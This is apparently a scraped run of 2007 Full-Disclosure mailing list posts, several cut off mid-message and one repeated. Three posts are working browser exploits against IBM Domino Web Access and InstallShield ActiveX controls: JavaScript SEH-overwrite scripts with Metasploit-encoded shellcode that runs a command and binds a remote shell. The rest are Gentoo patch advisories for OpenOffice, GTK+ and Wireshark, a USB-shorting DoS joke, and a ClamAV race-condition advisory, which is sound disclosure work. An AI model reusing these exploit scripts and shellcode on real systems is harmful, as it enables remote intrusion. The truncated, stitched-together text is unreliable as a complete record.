[Full-disclosure] IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
This one is unicode based, so is inotes6w. Exploitation for inotes6w is probably the same just with a different offset. Code is inline and attached. - IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check() { var buf = unescape("%u4141"); while (buf.length <= 2461) buf = buf + unescape("%u4141"); // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%u%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" + "%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" + 
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" + "%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" + "%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" + "%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" + "%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" + "%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" + "%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" + "%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" + "%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" + "%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" + "%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" + "%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" + "%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" + "%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" + "%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" + "%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" + "%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" + "%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" + "%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" + "%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" + "%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" + "%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" + "%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" + "%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" + "%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" + "%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" + "%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
[Full-disclosure] Installshield isusweb.dll Buffer Overflow Exploit
MC has already made a Metasploit module for this, and Symantec has released BloodHound signatures for general isusweb abuse. Code is inline and attached. Macrovision Installshield isusweb.dll SEH Overwrite Exploit function Check() { var buf = 'A'; while (buf.length <= 599) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" + "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" + "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" + 
"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" + "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" + "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" + "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" + "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" + "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" + "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" + "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" + "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" + "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" + "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" + "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" + "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" + "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" + "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" + "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" + "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" + "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" + "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" + "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" + "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" + "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" + "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" + "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" + "%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" + "%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" + "%73%71%78%58%67%61%6
Re: [Full-disclosure] usb shorting to ground
Todd Troxell wrote: > I discovered rather inadvertently that laptops do not enjoy having > their USB VCC shorted to GND one bit. It is a sure DoS, in fact if > the machine has a stupid power supply, it could result in permanent > damage. It is kind of scary for kiosk machines like those > ubiquitous Kodak photo centers. > > I give you, the usb pwner. It could even hide inside a legitimate > stick: > > USB Pwner schematic > > VCC > D+ ---(nc)| > D ---(nc)| > GND See also ... http://www.hackerslab.org/images/geek/2005/may/etherkiller.jpg cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IBM Domino Web Access inotes6.dll SEH Overwrite Exploit
My first attempt at an SEH overwrite exploit. Anyhow, I first posted about this issue regarding version 7 of this control, Will Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and inotes6w.dll are unicode, thats my next project. Code is inline and attached. - IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit function Check() { var buf = 'A'; while (buf.length <= 3119) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); // win32_bind - EXITFUNC=seh LPORT= Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" + "%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" + "%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" + "%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" + "%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" + "%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" + "%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" + "%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" + "%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" + "%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" + "%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" + "%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" + "%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" + "%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" + "%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" + "%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" + "%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" + "%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" + "%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" + "%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" + "%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" + "%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" + "%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" + "%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" + "%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" + "%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" + "%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +
[Full-disclosure] [ GLSA 200712-25 ] OpenOffice.org: User-assisted arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenOffice.org: User-assisted arbitrary code execution Date: December 30, 2007 Bugs: #200771, #201799 ID: 200712-25 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An unspecified vulnerability has been reported in OpenOffice.org, possibly allowing for the execution of arbitrary code. Background == OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-office/openoffice < 2.3.1 >= 2.3.1 2 app-office/openoffice-bin < 2.3.1 >= 2.3.1 3 dev-db/hsqldb < 1.8.0.9 >= 1.8.0.9 --- 3 affected packages on all of their supported architectures. --- Description === The HSQLDB engine, as used in Openoffice.org, does not properly enforce restrictions to SQL statements. Impact == A remote attacker could entice a user to open a specially crafted document, possibly resulting in the remote execution of arbitrary Java code with the privileges of the user running OpenOffice.org. Workaround == There is no known workaround at this time. 
Resolution == All OpenOffice.org users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.3.1" All OpenOffice.org binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.3.1" All HSQLDB users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/hsqldb-1.8.0.9" References == [ 1 ] CVE-2007-4575 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4575 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-25.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHd+PZuhJ+ozIKI5gRAnw3AKCTR9OoJrvosyOIWsPR75YN/tIE1QCgmLpL hRdVKFeTyqcR6PIKgWqWExw= =6HQd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-24 ] AMD64 x86 emulation GTK+ library: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation GTK+ library: User-assisted execution of arbitrary code Date: December 30, 2007 Bugs: #201860 ID: 200712-24 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflow vulnerabilities in the AMD64 x86 emulation GTK+ libraries may result in the execution of arbitrary code in applications using Cairo. Background == Cairo is a 2D vector graphics library with cross-device output support. The AMD64 x86 emulation GTK+ library packages Cairo libraries for 32bit x86 emulation on AMD64. Affected packages = --- Package / Vulnerable / Unaffected --- 1 emul-linux-x86-gtklibs < 20071214 >= 20071214 --- # Package 1 only applies to AMD64 users. Description === The Cairo versions used by the AMD64 x86 emulation GTK+ libraries were vulnerable to integer overflow vulnerabilities (GLSA 200712-04). Impact == A remote attacker could entice a user to view or process a specially crafted PNG image file in an application linked against Cairo, possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All AMD64 x86 emulation GTK+ library users should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-gtklibs-20071214" References == [ 1 ] GLSA 200712-04 http://www.gentoo.org/security/en/glsa/glsa-200712-04.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-24.xml Concerns? 
= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-23 ] Wireshark: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Wireshark: Multiple vulnerabilities Date: December 30, 2007 Bugs: #199958 ID: 200712-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Wireshark, allowing for the remote execution of arbitrary code and a Denial of Service. Background == Wireshark is a network protocol analyzer with a graphical front-end. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/wireshark < 0.99.7 >= 0.99.7 Description === Multiple buffer overflows and infinite loops were discovered in multiple dissector and parser components, including those for MP3 and NCP (CVE-2007-6111), PPP (CVE-2007-6112), DNP (CVE-2007-6113), SSL and iSeries (OS/400) Communication traces (CVE-2007-6114), ANSI MAP (CVE-2007-6115), Firebird/Interbase (CVE-2007-6116), HTTP (CVE-2007-6117), MEGACO (CVE-2007-6118), DCP ETSI (CVE-2007-6119), Bluetooth SDP (CVE-2007-6120), RPC Portmap (CVE-2007-6121), SMB (CVE-2007-6438), IPv6 and USB (CVE-2007-6439), WiMAX (CVE-2007-6441), RPL (CVE-2007-6450), CIP (CVE-2007-6451). The vulnerabilities were discovered by Stefan Esser, Beyond Security, Fabiodds, Peter Leeming, Steve and ainsley. Impact == A remote attacker could send specially crafted packets on a network being monitored with Wireshark or entice a user to open a specially crafted file, possibly resulting in the execution of arbitrary code with the privileges of the user running Wireshark (which might be the root user), or a Denial of Service. Workaround == There is no known workaround at this time. 
Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-0.99.7" References == [ 1 ] CVE-2007-6111 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111 [ 2 ] CVE-2007-6112 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112 [ 3 ] CVE-2007-6113 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113 [ 4 ] CVE-2007-6114 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114 [ 5 ] CVE-2007-6115 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115 [ 6 ] CVE-2007-6116 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116 [ 7 ] CVE-2007-6117 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117 [ 8 ] CVE-2007-6118 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118 [ 9 ] CVE-2007-6119 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119 [ 10 ] CVE-2007-6120 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120 [ 11 ] CVE-2007-6121 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121 [ 12 ] CVE-2007-6438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438 [ 13 ] CVE-2007-6439 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439 [ 14 ] CVE-2007-6441 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441 [ 15 ] CVE-2007-6450 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450 [ 16 ] CVE-2007-6451 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-23.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). 
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overview: 1) ClamAV uses its own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing the scanner to be bypassed through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name, which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she can create a file with that name between the call to cli_gentemp() and the call to open(), making it possible to overwrite, with temporary data, arbitrary files to which the user running ClamAV has write access. A fix for this problem is to pass the O_EXCL flag to open() (together with O_CREAT, which the call above already uses); with O_EXCL set, open() fails instead of opening a file that already exists. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir or 
"/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): as seed, more or less public information which should be relatively easy to be guessed by the attacker is used, making it possible to guess the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race conditions. 
Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes that name to open() with the O_EXCL flag set. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Among others, UUEncoded files
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overview: 1) ClamAV uses its own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing the scanner to be bypassed through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name, which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she can create a file with that name between the call to cli_gentemp() and the call to open(), making it possible to overwrite, with temporary data, arbitrary files to which the user running ClamAV has write access. A fix for this problem is to pass the O_EXCL flag to open() (together with O_CREAT, which the call above already uses); with O_EXCL set, open() fails instead of opening a file that already exists. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir or 
